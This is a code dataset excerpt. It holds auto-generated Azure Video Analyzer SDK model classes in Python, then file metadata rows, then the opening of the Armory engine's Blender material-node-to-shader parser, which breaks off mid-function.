super(VideoArchival, self).__init__(**kwargs)
self.retention_period = kwargs.get('retention_period', None)
class VideoContentToken(msrest.serialization.Model):
""""Video content token grants access to the video content URLs.".
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The content token expiration date in ISO8601 format (eg.
2021-01-01T00:00:00Z).
:vartype expiration_date: ~datetime.datetime
:ivar token: The content token value to be added to the video content URL as the value for the
"token" query string parameter. The token is specific to a single video.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoContentToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class VideoContentUrls(msrest.serialization.Model):
"""Set of URLs to the video content.
:param download_url: Video file download URL. This URL can be used in conjunction with the
video content authorization token to download the video MP4 file. The resulting MP4 file can be
played on any standard media player. It is available when the video type is 'file' and video
file is available for consumption.
:type download_url: str
:param archive_base_url: Video archive streaming base URL. The archived content can be
automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be
used in conjunction with the video content authorization token on any compatible DASH or HLS
players by appending the following to the base URL:
.. code-block::
- HLSv4: /manifest(format=m3u8-aapl).m3u8
- HLS CMAF: /manifest(format=m3u8-cmaf)
- DASH CMAF: /manifest(format=mpd-time-cmaf)
Moreover, an ongoing video recording can be played in "live mode" with latencies which are
approximately double of the chosen video segment length. It is available when the video type is
'archive' and video archiving is enabled.
:type archive_base_url: str
:param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically
played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in
conjunction with the video content authorization token to expose a WebSocket tunneled RTSP
stream. It is available when the video type is 'archive' and a live, low-latency feed is
available from the source.
:type rtsp_tunnel_url: str
:param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction with
the video content authorization token to download the most recent still image from the video
archive in different resolutions. They are available when the video type is 'archive' and
preview images are enabled.
:type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls
"""
_attribute_map = {
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'},
'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'},
'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'},
}
def __init__(
self,
**kwargs
):
super(VideoContentUrls, self).__init__(**kwargs)
self.download_url = kwargs.get('download_url', None)
self.archive_base_url = kwargs.get('archive_base_url', None)
self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None)
self.preview_image_urls = kwargs.get('preview_image_urls', None)
class VideoCreationProperties(msrest.serialization.Model):
"""Optional properties to be used in case a new video resource needs to be created on the service. These will not take effect if the video already exists.
:param title: Optional title provided by the user. Value can be up to 256 characters long.
:type title: str
:param description: Optional description provided by the user. Value can be up to 2048
characters long.
:type description: str
:param segment_length: Segment length indicates the length of individual content files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to
5 minutes, in 30 seconds increments. Changing this value after the initial call to create the
video resource can lead to errors when uploading content to the archive. Default value is 30
seconds. This property is only allowed for topologies where "kind" is set to "live".
:type segment_length: str
:param retention_period: Video retention period indicates how long the video is kept in
storage. Value must be specified in ISO8601 duration format (i.e. "P1D" equals 1 day) and can
vary between 1 day to 10 years, in 1 day increments. When absent (null), all video content is
retained indefinitely. This property is only allowed for topologies where "kind" is set to
"live".
:type retention_period: str
"""
_attribute_map = {
'title': {'key': 'title', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'segment_length': {'key': 'segmentLength', 'type': 'str'},
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoCreationProperties, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.segment_length = kwargs.get('segment_length', None)
self.retention_period = kwargs.get('retention_period', None)
class VideoEncoderBase(msrest.serialization.Model):
"""Base type for all video encoding presets, which define the recipe or instructions on how the input video should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoEncoderH264.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
be encoded. If omitted, encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'}
}
def __init__(
self,
**kwargs
):
super(VideoEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.frame_rate = kwargs.get('frame_rate', None)
self.scale = kwargs.get('scale', None)
class VideoEncoderH264(VideoEncoderBase):
"""A custom preset for encoding video with the H.264 (AVC) codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
be encoded. If omitted, encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
def __init__(
self,
**kwargs
):
super(VideoEncoderH264, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str
class VideoEntity(ProxyResource):
"""Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param title: Optional video title provided by the user. Value can be up to 256 characters
long.
:type title: str
:param description: Optional video description provided by the user. Value can be up to 2048
characters long.
:type description: str
:ivar type_properties_type: Video content type. Different content types are suitable for
different applications and scenarios. Possible values include: "Archive", "File".
:vartype type_properties_type: str or ~video_analyzer.models.VideoType
:ivar flags: Video flags contain information about the available video actions and its dynamic
properties based on the current video state.
:vartype flags: ~video_analyzer.models.VideoFlags
:ivar content_urls: Set of URLs to the video content.
:vartype content_urls: ~video_analyzer.models.VideoContentUrls
:param media_info: Contains information about the video and audio content.
:type media_info: ~video_analyzer.models.VideoMediaInfo
:param archival: Video archival properties.
:type archival: ~video_analyzer.models.VideoArchival
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'type_properties_type': {'readonly': True},
'flags': {'readonly': True},
'content_urls': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'title': {'key': 'properties.title', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'type_properties_type': {'key': 'properties.type', 'type': 'str'},
'flags': {'key': 'properties.flags', 'type': 'VideoFlags'},
'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'},
'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'},
'archival': {'key': 'properties.archival', 'type': 'VideoArchival'},
}
def __init__(
self,
**kwargs
):
super(VideoEntity, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.type_properties_type = None
self.flags = None
self.content_urls = None
self.media_info = kwargs.get('media_info', None)
self.archival = kwargs.get('archival', None)
class VideoEntityCollection(msrest.serialization.Model):
"""A collection of VideoEntity items.
:param value: A collection of VideoEntity items.
:type value: list[~video_analyzer.models.VideoEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class VideoFlags(msrest.serialization.Model):
"""Video flags contain information about the available video actions and its dynamic properties based on the current video state.
All required parameters must be populated in order to send to Azure.
:param can_stream: Required. Value indicating whether or not the video can be streamed. Only
"archive" type videos can be streamed.
:type can_stream: bool
:param has_data: Required. Value indicating whether or not there has ever been data recorded or
uploaded into the video. Newly created videos have this value set to false.
:type has_data: bool
:param is_in_use: Required. Value indicating whether or not the video is currently being
referenced be an active pipeline. The fact that is being referenced, doesn't necessarily
indicate that data is being received. For example, video recording may be gated on events or
camera may not be accessible at the time.
:type is_in_use: bool
"""
_validation = {
'can_stream': {'required': True},
'has_data': {'required': True},
'is_in_use': {'required': True},
}
_attribute_map = {
'can_stream': {'key': 'canStream', 'type': 'bool'},
'has_data': {'key': 'hasData', 'type': 'bool'},
'is_in_use': {'key': 'isInUse', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(VideoFlags, self).__init__(**kwargs)
self.can_stream = kwargs['can_stream']
self.has_data = kwargs['has_data']
self.is_in_use = kwargs['is_in_use']
class VideoMediaInfo(msrest.serialization.Model):
"""Contains information about the video and audio content.
:param segment_length: Video segment length indicates the length of individual video files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to
5 minutes, in 30 seconds increments.
:type segment_length: str
"""
_attribute_map = {
'segment_length': {'key': 'segmentLength', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoMediaInfo, self).__init__(**kwargs)
self.segment_length = kwargs.get('segment_length', None)
class VideoPreviewImageUrls(msrest.serialization.Model):
"""Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled.
:param small: Low resolution preview image URL.
:type small: str
:param medium: Medium resolution preview image URL.
:type medium: str
:param large: High resolution preview image URL.
:type large: str
"""
_attribute_map = {
'small': {'key': 'small', 'type': 'str'},
'medium': {'key': 'medium', 'type': 'str'},
'large': {'key': 'large', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPreviewImageUrls, self).__init__(**kwargs)
self.small = kwargs.get('small', None)
self.medium = kwargs.get('medium', None)
self.large = kwargs.get('large', None)
class VideoPublishingOptions(msrest.serialization.Model):
"""Optional flags used to change how video is published. These are only allowed for topologies where "kind" is set to "live".
:param disable_archive: When set to 'true' content will not be archived or recorded. This is
used, for example, when the topology is used only for low latency video streaming. Default is
'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'.
:type disable_archive: str
:param disable_rtsp_publishing: When set to 'true' the RTSP playback URL will not be published,
disabling low latency streaming. This is used, for example, when the topology is used only for
archiving content. Default is 'false'. If set to 'true', then "disableArchive" must be set to
'false'.
:type disable_rtsp_publishing: str
"""
_attribute_map = {
'disable_archive': {'key': 'disableArchive', 'type': 'str'},
'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPublishingOptions, self).__init__(**kwargs)
self.disable_archive = kwargs.get('disable_archive', None)
self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None)
class VideoScale(msrest.serialization.Model):
"""The video scaling information.
:param height: The desired output video height.
:type height: str
:param width: The desired output video width.
:type width: str
:param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the mode
is 'Pad' or 'Stretch' then both width and height must be specified. Else if the mode is
'PreserveAspectRatio' then only one of width or height need be provided. Possible values
include: "Pad", "PreserveAspectRatio", "Stretch".
:type mode: str or ~video_analyzer.models.VideoScaleMode
"""
_attribute_map = {
'height': {'key': 'height', 'type': 'str'},
'width': {'key': 'width', 'type': 'str'},
'mode': {'key': 'mode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoScale, self).__init__(**kwargs)
self.height = kwargs.get('height', None)
self.width = kwargs.get('width', None)
self.mode = kwargs.get('mode', None)
class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase):
"""A sequence of absolute datetime ranges as a string. The datetime values should follow IS08601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be only one range specified in the sequence.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z",
"2021-10-05T03:40:00Z"]]'.
:type ranges: str
"""
_validation = {
'type': {'required': True},
'ranges': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'ranges': {'key': 'ranges', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers' # type: str
self.ranges = kwargs['ranges']
class VideoSink(SinkNodeBase):
"""Video sink in a live topology allows for video and audio to be captured, optionally archived, and published via a video resource. If archiving is enabled, this results in a video of type 'archive'. If used in a batch topology, this allows for video and audio to be stored as a file, and published via a video resource of type 'file'.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param video_name: Required. Name of a new or existing video resource used to capture and
publish content. Note: if downstream of RTSP source, and if disableArchive is set to true, then
no content is archived.
:type video_name: str
:param video_creation_properties: Optional video properties to be used in case a new video
resource needs to be created on the service.
:type video_creation_properties: ~video_analyzer.models.VideoCreationProperties
:param video_publishing_options: Options to change how the video sink publishes content via the
video resource. This property is only allowed for topologies where "kind" is set to "live".
:type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'video_name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'video_name': {'key': 'videoName', 'type': 'str'},
'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'},
'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'},
}
def __init__(
self,
**kwargs
):
super(VideoSink, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSink' # type: str
self.video_name = kwargs['video_name']
self.video_creation_properties = kwargs.get('video_creation_properties', None)
self.video_publishing_options = kwargs.get('video_publishing_options', None)
class VideoSource(SourceNodeBase):
"""Video source allows for content from a Video Analyzer video resource to be ingested into a pipeline. Currently supported only with batch pipelines.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param video_name: Required. Name of the Video Analyzer video resource to be used as the
source.
:type video_name: str
:param time_sequences: Required. Describes a sequence of datetime ranges. The video source only
picks up recorded media within these ranges.
:type time_sequences: ~video_analyzer.models.TimeSequenceBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'video_name': {'required': True},
'time_sequences': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'video_name': {'key': 'videoName', 'type': 'str'},
'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'},
}
def __init__(
self,
**kwargs
):
super(VideoSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSource' # type: str
self.video_name = kwargs['video_name']
self.time_sequences = kwargs['time_sequences']
| 38.473447
| 815
| 0.658563
| 17,602
| 153,586
| 5.62527
| 0.061982
| 0.023542
| 0.026672
| 0.017856
| 0.674487
| 0.640088
| 0.612739
| 0.57317
| 0.558122
| 0.548942
| 0
| 0.002714
| 0.222566
| 153,586
| 3,991
| 816
| 38.483087
| 0.826545
| 0.497591
| 0
| 0.619886
| 0
| 0
| 0.27065
| 0.063819
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053858
| false
| 0.003625
| 0.001036
| 0
| 0.209736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c4fedd0e6fc912cf1a282846b6e90c655a094c7
| 69,123
|
py
|
Python
|
blender/arm/material/cycles.py
|
philipmduarte/armory
|
675211c66a1e49147226ccb472a6f5dc87b7db02
|
[
"Zlib"
] | 1
|
2021-03-17T05:51:45.000Z
|
2021-03-17T05:51:45.000Z
|
blender/arm/material/cycles.py
|
philipmduarte/armory
|
675211c66a1e49147226ccb472a6f5dc87b7db02
|
[
"Zlib"
] | null | null | null |
blender/arm/material/cycles.py
|
philipmduarte/armory
|
675211c66a1e49147226ccb472a6f5dc87b7db02
|
[
"Zlib"
] | null | null | null |
#
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
if output_node != None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
particle_info = {}
particle_info['index'] = False
particle_info['age'] = False
particle_info['lifetime'] = False
particle_info['location'] = False
particle_info['size'] = False
particle_info['velocity'] = False
particle_info['angular_velocity'] = False
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
if rpdat.arm_rp_displacement == 'Tessellation' and tese != None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
def parse_group(node, socket): # Entering group
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
if output_node == None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
if inp.type == 'SHADER':
return parse_shader_input(inp)
elif inp.type == 'RGB':
return parse_vector_input(inp)
elif inp.type == 'RGBA':
return parse_vector_input(inp)
elif inp.type == 'VECTOR':
return parse_vector_input(inp)
elif inp.type == 'VALUE':
return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
# clearcoar_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
